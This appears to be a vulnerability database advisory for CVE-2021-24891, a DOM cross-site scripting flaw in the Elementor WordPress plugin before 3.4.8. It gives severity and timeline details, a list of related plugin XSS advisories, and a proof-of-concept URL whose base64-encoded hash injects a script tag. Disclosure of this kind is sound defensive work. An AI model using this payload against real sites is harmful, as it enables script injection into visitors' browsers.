Elementor < 3.4.8 – DOM Cross-Site-Scripting | CVE 2021-24891

Description

The plugin does not sanitise or escape user input appended to the DOM via a malicious hash, resulting in a DOM Cross-Site Scripting issue.

The issue was initially fixed in 3.1.4, however re-introduced in 3.2.0.

Proof of Concept

https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9

Affects Plugins

elementor

Fixed in 3.4.8

References

CVE

CVE-2021-24891

URL

https://www.jbelamor.com/xss-elementor-lightox.html

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

6.1 (medium)

Miscellaneous

Original Researcher

Joel

Submitter

Joel

Submitter website

https://www.jbelamor.com/

Verified

Yes

WPVDB ID

fbed0daa-007d-4f91-8d87-4bca7781de2d

Timeline

Publicly Published

2021-03-24 (about 4 years ago)

Added

2021-10-20 (about 4 years ago)

Last Updated

2022-04-14 (about 3 years ago)

Other

Published

Title

Published

2024-05-07

Title

3D FlipBook, PDF Viewer, PDF Embedder – Real 3D FlipBook WordPress Plugin < 3.72 - Authenticated (Author+) Stored Cross-Site Scripting

Published

2023-05-09

Title

Restaurant Menu < 2.3.7 - Reflected XSS

Published

2025-09-22

Title

HT Mega – Absolute Addons for WPBakery Page Builder < 1.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-05-10

Title

Thim Elementor Kit < 1.1.9.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via id Parameter

Published

2021-11-08

Title

Bookly < 20.3.1 - Staff Member Stored Cross-Site Scripting